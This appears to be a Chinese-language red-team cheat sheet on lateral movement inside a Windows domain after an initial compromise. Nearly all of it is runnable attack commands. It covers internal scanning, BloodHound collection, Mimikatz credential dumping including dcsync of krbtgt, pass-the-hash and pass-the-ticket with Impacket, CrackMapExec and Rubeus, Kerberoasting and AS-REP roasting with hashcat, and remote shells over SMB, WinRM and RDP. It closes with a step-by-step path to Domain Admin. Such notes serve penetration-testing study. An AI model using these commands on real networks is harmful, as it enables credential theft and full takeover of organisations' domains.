横向移动笔记
拿到一台机器后,在内网扩大战果的技术集合。
🔍 内网信息收集
主机与网段发现
bash
# 本机信息
ipconfig /all # Windows
ip a; ip route # Linux
# 活跃主机
nmap -sn 10.10.10.0/24
arp -a
# 从被控机做端口扫描(通过代理)
proxychains nmap -sT -Pn -n <目标>Windows 域信息
bash
# 域/用户/组
net user /domain
net group "Domain Admins" /domain
whoami /all
# BloodHound 数据收集
# Linux
bloodhound-python -u user -p pass -d domain.local -ns <DC> -c All
# Windows
SharpHound.exe -c All🔑 凭据抓取与传递
凭据抓取
powershell
# Mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
lsadump::dcsync /user:krbtgt
# 安全上下文
rubeus.exe triage
rubeus.exe dumpPass-the-Hash / Pass-the-Ticket
bash
# PTH - Impacket
impacket-psexec domain/user@$IP -hashes :<NTLM>
impacket-wmiexec domain/user@$IP -hashes :<NTLM>
# PTH - CrackMapExec
crackmapexec smb $IP -u user -H <NTLM>
# PTT - Rubeus
Rubeus.exe ptt /ticket:<base64>🎫 Kerberos 攻击
| 攻击 | 前提 | 典型工具 |
|---|---|---|
| Kerberoasting | 拥有任意域账号 | Rubeus / impacket-GetUserSPNs |
| AS-REP Roasting | 目标账号禁用预认证 | impacket-GetNPUsers |
| Unconstrained Delegation | 控制配置了非约束委派的机器 | Rubeus monitor |
| Constrained Delegation | 控制配置了约束委派的账号 | Rubeus s4u |
| Golden Ticket | 拿到 krbtgt hash | mimikatz / Rubeus |
| Silver Ticket | 拿到服务账号 hash | mimikatz / Rubeus |
bash
# Kerberoasting
impacket-GetUserSPNs domain/user:pass -dc-ip <DC> -request
# AS-REP Roasting
impacket-GetNPUsers domain/ -usersfile users.txt -dc-ip <DC>
# 破解
hashcat -m 13100 kerberoast.hash rockyou.txt # TGS
hashcat -m 18200 asrep.hash rockyou.txt # AS-REP🚚 远程执行
bash
# SMB
impacket-psexec / smbexec / wmiexec
crackmapexec smb $IP -u user -p pass -x "whoami"
# WinRM
evil-winrm -i $IP -u user -p pass
# RDP
xfreerdp /u:user /p:pass /v:$IP /dynamic-resolution🌉 隧道与代理
详见 网络攻防 笔记中的隧道部分:Chisel / Ligolo-ng / SSH 动态转发 / socks。
📋 标准流程
- 当前主机信息收集(用户/组/进程/网络)
- 抓取本机凭据与令牌
- 扫描网段、识别域控/文件服务器等高价值目标
- BloodHound 画图找最短攻击路径
- 用凭据/票据移动 → 扩大控制面
- 逐步逼近 DA / Enterprise Admin
🔗 参考资源
持续更新中...

